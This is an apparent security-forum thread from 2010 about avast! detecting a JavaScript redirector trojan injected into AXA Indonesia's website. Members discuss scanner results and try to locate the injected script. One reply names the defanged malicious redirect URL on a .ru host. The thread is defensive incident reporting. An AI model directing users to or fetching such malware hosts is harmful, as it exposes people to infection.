AXA Financial Website was injected with JS:Illredir-CB [Trj]

Dear All,

I just got information from my friend that one of biggest financial provider AXA Financial, their website was injected with JS:Illredir-CB [Trj].
avast! was detected there is 3 location was infected :

avast! [YANTOCHIANG-PC]: File “http://wxw.axa.co.id/DropDownMenuX.js” is infected by “JS:Illredir-CB [Trj]” virus.
“%3” task used
Version of current VPS file is 100607-2, 06/08/2010

avast! [YANTOCHIANG-PC]: File “http://wxw.axa.co.id/ie5.js” is infected by “JS:Illredir-CB [Trj]” virus.
“%3” task used
Version of current VPS file is 100607-2, 06/08/2010

avast! [YANTOCHIANG-PC]: File “http://wxw.axa.co.id/” is infected by “JS:Illredir-CB [Trj]” virus.
“%3” task used
Version of current VPS file is 100607-2, 06/08/2010

And from the summary website scanning tool, this website got suspicious category :

http://www.unmaskparasites.com/security-report/

I need to know where is the exactly location at their HTML script was injected?

This page seems to be 1 suspicious inline script found.
http://www.UnmaskParasites.com/security-report/?page=www.axa.co.id

VirusTotal - axa.co.id.htm - 8/41
http://www.virustotal.com/analisis/40f5bf00aacfa11860323a34260abea575772d3d292afaafe53d589f1f65337d-1275988821

Hi Pondus,

Yes you are rite, i just would like to know which part of this website was injected with the script.

cheers,

not sure, but DavidR or Polonus will tell you when they arrive

Hi Pondus,

Thanks for your kindly advice,

I need this because if i can contact their web administrator it would be helpful for them.

Since they are core business in financial transaction, i am afraid it would be harmful for other client which related with AXA Financial.

cheers,

According to Wepawet, at this website found nothing harmful script :

http://wepawet.iseclab.org/view.php?hash=040f6e2c7a680c8297f10b249fd9a01d&t=1275980714&type=js

Definitely malware redirector. Wepawet does even find the russian link, but it’s down.

Hi Kubejc,

Thanks for your kindly information and advice.

cheers,

Hi YantoChiang,

Make the links in your first posting so they cannot be clicked through, suspicious links should be written with wxw or htxp so the curious cannot click them and get themselves infested with malware.

If you analyze there, as kubecj pointed out to us, you would get a drop-down from here: wXw.axa.co.id/DropDownMenuX.js
to CreateElement here: hxtp://surechip.ru:8080/google.com/google.co.ve/digitalpoint.com.php
Empty source - Could not connect to site?

polonus

Hi Polonus,

I am sorry for inconvenience causes, but i already fixed it.

By the way, do you know how to trace the location of those scripts?

Hi Yanto.Chiang,

I PM-ed you with extensive instructions how to do this safely and securely,
good hunt,

polonus